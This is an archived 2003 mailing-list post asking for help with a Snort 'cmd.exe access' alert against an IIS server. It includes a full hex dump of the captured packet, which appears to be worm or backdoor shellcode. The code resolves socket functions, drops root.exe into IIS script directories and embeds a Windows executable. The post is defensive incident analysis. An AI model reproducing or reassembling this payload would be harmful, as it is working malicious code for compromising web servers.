strange cmd.exe access

From: Q (quentyn_at_the-q.co.uk)
Date: 05/29/03

    Date: Thu, 29 May 2003 20:10:25 +0100 (BST)
    To: incidents@securityfocus.com
    
    

    Hi, I saw this packet

    #(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
    IPv4: 194.204.X.X -> X.X.X.X
          hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116 chksum=60435
    TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841
          ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
    Payload: length = 1432

    000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
    010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
    020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
    030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
    040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
    050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
    060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
    070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
    080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
    090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
    0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
    0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
    0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
    0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
    0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
    0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
    100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
    110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
    120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
    130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
    140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
    150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
    160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
    170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
    180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
    190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
    1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
    1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
    1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
    1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
    1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
    1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
    200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
    210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
    220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
    230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
    240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
    250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
    260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
    270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
    280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
    290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
    2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
    2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
    2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
    2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
    2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
    2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
    300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
    310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
    320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
    330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
    340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
    350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
    360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
    370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
    380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@.......
    390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
    3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
    3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
    3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
    3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
    3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
    400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
    410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
    420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
    430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
    440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@.........
    450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
    460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
    470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
    480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
    490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
    4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
    4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
    4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h.
    4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
    4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
    4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
    500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
    510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
    520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
    530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
    540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
    550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
    560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
    570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
    580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
    590 : D4 24 40 00 6A 00 55 FF .$@.j.U.

    What is strange is that the cmd.exe / root.exe stuff is halfway through,
    with some other code before it.

    The IP it hit was not mapped to anything (I believe it is unused), so this
    cannot have been part of another TCP conversation.

    Any ideas?

    --
    There should be a sig here, but it got bored and wandered off
    ----------------------------------------------------------------------------
    ----------------------------------------------------------------------------
    
